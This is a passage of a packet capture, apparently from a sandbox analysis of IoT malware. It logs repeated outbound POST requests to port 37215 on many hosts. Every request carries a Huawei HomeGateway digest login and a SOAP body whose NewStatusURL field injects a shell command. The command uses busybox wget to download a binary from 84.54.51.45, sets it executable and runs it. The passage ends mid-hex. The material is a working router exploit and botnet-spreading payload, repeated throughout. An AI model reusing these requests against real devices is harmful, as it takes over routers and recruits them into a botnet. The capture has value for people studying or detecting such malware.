                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2485192.168.2.153888641.224.244.13537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816934109 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2486192.168.2.153598041.202.226.3837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816967010 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2487192.168.2.154081441.190.59.10137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816993952 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2488192.168.2.155355641.5.103.16237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817017078 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2489192.168.2.153558641.97.189.1037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817044020 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2490192.168.2.154684841.244.42.337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817068100 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2491192.168.2.155815041.221.46.9037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817125082 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2492192.168.2.154694241.10.193.7737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817154884 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2493192.168.2.153689241.216.0.19037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817174911 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2494192.168.2.155860441.15.184.11337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817199945 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 